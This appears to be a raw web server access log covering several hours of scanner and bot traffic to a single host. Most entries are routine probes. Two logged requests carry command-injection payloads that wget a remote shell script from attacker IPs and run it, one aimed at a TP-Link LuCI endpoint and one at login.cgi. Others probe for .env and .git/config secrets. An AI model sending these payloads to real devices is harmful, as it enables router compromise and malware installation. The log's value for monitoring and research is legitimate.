154.81.156.54 - - [30/Apr/2025:18:25:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.95.147.209 - - [30/Apr/2025:18:33:08 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
194.145.227.125 - - [30/Apr/2025:18:37:54 +0200] "GET / HTTP/1.1" 200 423 "-" "ALittle Client"
194.145.227.125 - - [30/Apr/2025:18:37:56 +0200] "GET / HTTP/1.1" 200 423 "-" "ALittle Client"
152.53.46.183 - - [30/Apr/2025:18:45:25 +0200] "GET /images/devs.png HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.5708.803 Safari/537.36"
185.218.84.178 - - [30/Apr/2025:18:49:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.7 - - [30/Apr/2025:18:58:16 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
154.81.156.54 - - [30/Apr/2025:19:04:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
190.204.208.147 - - [30/Apr/2025:19:09:08 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello-World/1.0"
3.94.3.54 - - [30/Apr/2025:19:43:53 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
154.81.156.54 - - [30/Apr/2025:19:50:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.79.192.50 - - [30/Apr/2025:19:54:24 +0200] "GET /wp-content/uploads/grup13-300x169.jpg HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
45.156.128.131 - - [30/Apr/2025:19:57:06 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
154.81.156.35 - - [30/Apr/2025:19:57:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.86.4 - - [30/Apr/2025:20:02:23 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [30/Apr/2025:20:21:00 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.78.151.20 - - [30/Apr/2025:20:22:31 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
80.82.77.202 - - [30/Apr/2025:20:33:47 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36"
115.41.75.20 - - [30/Apr/2025:20:58:26 +0200] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
43.156.156.96 - - [30/Apr/2025:21:05:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
154.81.156.54 - - [30/Apr/2025:21:19:47 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [30/Apr/2025:21:40:13 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
166.161.62.199 - - [30/Apr/2025:21:44:25 +0200] "GET / HTTP/1.1" 200 423 "-" "Hello-World/1.0"
185.218.84.178 - - [30/Apr/2025:21:48:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.174.93.12 - - [30/Apr/2025:21:57:13 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; Android 9; ONEPLUS A5000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
163.61.110.122 - - [30/Apr/2025:22:12:13 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.35 - - [30/Apr/2025:22:15:12 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
154.81.156.54 - - [30/Apr/2025:22:23:50 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
13.251.106.109 - - [30/Apr/2025:22:27:10 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
80.82.77.202 - - [30/Apr/2025:22:28:10 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
185.218.86.4 - - [30/Apr/2025:22:43:36 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.130.4 - - [30/Apr/2025:22:45:10 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
154.81.156.7 - - [30/Apr/2025:22:47:03 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
20.29.46.9 - - [30/Apr/2025:23:03:09 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
154.81.156.54 - - [30/Apr/2025:23:08:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.169.39.15 - - [30/Apr/2025:23:24:29 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:03 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.72.176.129 - - [30/Apr/2025:23:25:04 +0200] "GET /layout.php HTTP/1.1" 200 816 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:04 +0200] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:04 +0200] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:04 +0200] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:04 +0200] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:04 +0200] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.122.147.229 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.72.176.129 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.72.176.129 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.72.176.129 - - [30/Apr/2025:23:25:05 +0200] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/javascript/form_form.js?1746048304 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.72.176.129 - - [30/Apr/2025:23:25:05 +0200] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:05 +0200] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:05 +0200] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.122.147.229 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:05 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:10 +0200] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:10 +0200] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.123.170.104 - - [30/Apr/2025:23:25:10 +0200] "GET /entry.php?id=10287 HTTP/1.1" 200 2386 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.122.147.229 - - [30/Apr/2025:23:25:10 +0200] "GET /gui/javascript/form_form.js?1746048310 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10271&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
104.197.69.115 - - [30/Apr/2025:23:25:10 +0200] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.122.147.229 - - [30/Apr/2025:23:25:10 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
5.183.209.244 - - [30/Apr/2025:23:25:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.169.39.4 - - [30/Apr/2025:23:25:23 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
34.72.176.129 - - [30/Apr/2025:23:25:33 +0200] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
34.72.176.129 - - [30/Apr/2025:23:25:34 +0200] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
154.81.156.54 - - [30/Apr/2025:23:29:48 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.72.176.129 - - [30/Apr/2025:23:30:45 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.6422.60 Safari/537.36"
205.210.31.193 - - [30/Apr/2025:23:33:24 +0200] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
35.187.108.225 - - [30/Apr/2025:23:44:58 +0200] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io)"
77.48.135.6 - - [30/Apr/2025:23:57:47 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "POST /sdk HTTP/1.1" 404 348 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "GET /odinhttpcall1746044629 HTTP/1.1" 404 367 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "GET /evox/about HTTP/1.1" 404 355 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "GET /HNAP1 HTTP/1.1" 404 350 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
46.101.102.106 - - [30/Apr/2025:23:58:01 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
46.101.112.168 - - [30/Apr/2025:23:58:02 +0200] "GET /v2/_catalog HTTP/1.1" 404 356 "-" "Go-http-client/1.1"
164.92.196.207 - - [30/Apr/2025:23:58:02 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 366 "-" "Go-http-client/1.1"
157.230.20.154 - - [30/Apr/2025:23:58:02 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 367 "-" "Go-http-client/1.1"
164.92.196.207 - - [30/Apr/2025:23:58:02 +0200] "\x16\x03\x01" 400 383 "-" "-"
134.122.66.248 - - [30/Apr/2025:23:58:02 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 350 "-" "Go-http-client/1.1"
138.68.93.84 - - [30/Apr/2025:23:58:02 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
46.101.112.168 - - [30/Apr/2025:23:58:02 +0200] "\x16\x03\x01\x01$\x01" 400 383 "-" "-"
157.230.20.154 - - [30/Apr/2025:23:58:02 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 361 "-" "Go-http-client/1.1"
164.92.196.207 - - [30/Apr/2025:23:58:02 +0200] "\x16\x03\x01" 400 383 "-" "-"
104.248.158.135 - - [30/Apr/2025:23:58:02 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
37.139.5.66 - - [01/May/2025:00:11:46 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
176.65.134.155 - - [01/May/2025:00:20:32 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
176.65.134.155 - - [01/May/2025:00:20:35 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.81.156.54 - - [01/May/2025:00:23:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.169.39.44 - - [01/May/2025:00:26:57 +0200] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
154.81.156.51 - - [01/May/2025:00:32:28 +0200] "GET http://ipv4.icanhazip.com/ HTTP/1.1" 200 274 "-" "Go-http-client/1.1"
13.251.106.109 - - [01/May/2025:00:42:30 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
154.81.156.35 - - [01/May/2025:00:46:11 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.248.254.144 - - [01/May/2025:00:55:37 +0200] "GET /api/v1/ws/server HTTP/1.1" 404 361 "-" "Go-http-client/1.1"
154.81.156.54 - - [01/May/2025:01:01:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.218.84.178 - - [01/May/2025:01:04:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
92.255.57.58 - - [01/May/2025:01:12:46 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
47.237.115.100 - - [01/May/2025:01:39:35 +0200] "\x16\x03\x01" 400 383 "-" "-"
195.20.18.145 - - [01/May/2025:01:44:19 +0200] "GET /assets/plugins/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 404 406 "-" "ALittle Client"
195.20.18.145 - - [01/May/2025:01:44:22 +0200] "GET /assets/plugins/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg HTTP/1.1" 404 419 "-" "ALittle Client"
185.218.86.4 - - [01/May/2025:01:47:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
142.93.29.53 - - [01/May/2025:01:51:56 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
142.93.29.53 - - [01/May/2025:01:51:57 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
154.81.156.54 - - [01/May/2025:01:52:14 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.183.209.244 - - [01/May/2025:01:52:27 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"